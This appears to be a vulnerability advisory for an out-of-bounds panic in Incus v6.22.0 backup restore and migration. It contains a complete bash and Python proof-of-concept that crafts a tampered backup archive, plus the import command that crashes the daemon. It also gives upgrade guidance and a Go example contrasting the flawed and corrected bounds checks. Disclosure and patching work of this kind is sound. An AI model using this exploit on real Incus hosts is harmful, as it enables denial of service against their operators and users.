The vulnerability stems from a flawed bounds check inside the Incus backup‑restore and migration logic. When processing a backup archive, the code iterates over each physical snapshot using the index `i` and tries to access the corresponding metadata in the `Config.Snapshots` or `Config.VolumeSnapshots` slices. The guard condition used is `len(slice) >= i-1`. Because this condition can be true even when `i` is equal to or larger than the actual slice length, an out‑of‑bounds access occurs when `slice[i]` is dereferenced. This triggers a runtime panic, crashing the Incus daemon. An attacker can craft a backup archive that includes real snapshot directories (which drive the loop index `i`) but supplies an `index.yaml` with an empty or truncated snapshot metadata array. When the daemon attempts to restore such an archive, the out‑of‑bounds panic is triggered, leading to an immediate denial of service. Repeated exploitation can keep the Incus daemon offline. The same flawed pattern also appears in the migration path, making the vulnerability exploitable in two separate code paths. The affected file is `internal/server/storage/backend.go` in the Incus source tree.
Platform: Incus
Version: v6.22.0 (and earlier)
Vulnerability: Out‑of‑bounds panic
Severity: Medium
Date: 2026-05-04
Prediction: 2026-05-04
What Undercode Say:
Analytics indicates that a successful exploit requires authenticated access to Incus’ storage volume feature. The PoC below uses a tampered backup archive to trigger the panic.
```bash
#!/bin/bash
set -e
BASE_NAME="base-$(date +%s)"
PANIC_NAME="panic-$(date +%s)"
# Create an instance with one snapshot and export it as a valid backup.
incus init images:alpine/edge "$BASE_NAME" --project default
incus snapshot create "$BASE_NAME" snap0 --project default
incus export "$BASE_NAME" valid_snapshot_base.tar.gz --project default
mkdir -p extract_snapshot_bounds
tar -xzf valid_snapshot_base.tar.gz -C extract_snapshot_bounds/
chmod -R u+rwX extract_snapshot_bounds/
# Rewrite index.yaml: rename the instance and empty the snapshot metadata lists.
python3 -c "
import os
import sys
base = '$BASE_NAME'
panic = '$PANIC_NAME'
with open('extract_snapshot_bounds/backup/index.yaml', 'r') as f:
    lines = f.read().splitlines()
out = []
in_skip = False
skip_indent = 0
for line in lines:
    line = line.replace(base, panic)
    indent = len(line) - len(line.lstrip())
    if in_skip:
        # Drop the entries that belonged to the list being emptied.
        if not line.strip():
            continue
        if indent > skip_indent or (indent == skip_indent and line.lstrip().startswith('-')):
            continue
        else:
            in_skip = False
    if indent > 0 and (line.lstrip().startswith('snapshots:') or line.lstrip().startswith('volume_snapshots:')):
        out.append(line.split(':')[0] + ': []')
        in_skip = True
        skip_indent = indent
        continue
    out.append(line)
with open('extract_snapshot_bounds/backup/index.yaml', 'w') as f:
    f.write('\n'.join(out))
"
# Repack the archive; the snapshot directories are left in place.
cd extract_snapshot_bounds/
tar -czf ../exploit_snapshot_bounds_panic.tar.gz backup/
cd ..
rm -rf extract_snapshot_bounds/ valid_snapshot_base.tar.gz
echo "[+] PoC Tarball Created: exploit_snapshot_bounds_panic.tar.gz"
```
How to Exploit:
An authenticated Incus user runs the above script to create a specially crafted backup archive. The archive contains real snapshot directories but an empty `snapshots:` / `volume_snapshots:` list in `index.yaml`. Importing this archive with `incus import exploit_snapshot_bounds_panic.tar.gz --project default` causes the Incus daemon to panic and crash, resulting in a denial of service.
Protection from this CVE:
Upgrade to Incus version 6.22.1 (or any later release that includes the fix). The patch replaces the faulty condition `len(slice) >= i-1` with a proper bounds check `i < len(slice)`. For Debian systems, update to version 6.0.4-2+deb13u7 or later.
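The difference between the two guards, as an added Go example that is not taken from the Incus source: `Snapshot`, `flawedGuard`, `fixedGuard` and `lookup` are hypothetical names, and the inputs are constructed. It recovers the index-out-of-range panic so both conditions can be compared over the same directory and metadata counts.

```go
package main

import "fmt"

// Snapshot stands in for one snapshot metadata entry from index.yaml
// (hypothetical type, not the Incus definition).
type Snapshot struct{ Name string }

// flawedGuard is the condition quoted in the advisory: len(slice) >= i-1.
func flawedGuard(meta []Snapshot, i int) bool { return len(meta) >= i-1 }

// fixedGuard is the corrected bounds check: i < len(slice).
func fixedGuard(meta []Snapshot, i int) bool { return i < len(meta) }

// lookup walks the snapshot directories found in an archive and reads the
// metadata entry at the same index whenever guard allows it. An index
// out-of-range panic is recovered and reported instead of ending the process.
func lookup(dirs []string, meta []Snapshot, guard func([]Snapshot, int) bool) (matched int, panicked bool) {
	defer func() {
		if recover() != nil {
			panicked = true
		}
	}()
	for i := range dirs {
		if guard(meta, i) {
			_ = meta[i].Name // panics when i >= len(meta)
			matched++
		}
	}
	return matched, false
}

func main() {
	// Constructed inputs: snapshot directories versus metadata entries.
	cases := []struct {
		dirs []string
		meta []Snapshot
	}{
		{[]string{"snap0"}, nil},
		{[]string{"snap0", "snap1"}, []Snapshot{{"snap0"}}},
		{[]string{"snap0"}, []Snapshot{{"snap0"}}},
	}
	for _, c := range cases {
		_, fp := lookup(c.dirs, c.meta, flawedGuard)
		n, xp := lookup(c.dirs, c.meta, fixedGuard)
		fmt.Printf("dirs=%d meta=%d flawed panics=%v fixed panics=%v matched=%d\n",
			len(c.dirs), len(c.meta), fp, xp, n)
	}
}
```

With the corrected guard, a directory that has no metadata entry is skipped rather than indexed, so a mismatch between the two counts no longer reaches the slice access.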
Impact:
An authenticated attacker with access to Incus’ storage volume feature can crash the Incus daemon at will. By repeatedly triggering the panic, the attacker can keep the daemon offline, causing a sustained denial of service. No data corruption or privilege escalation occurs, but availability of the Incus service is completely compromised.
Sources:
Reported By: github.com

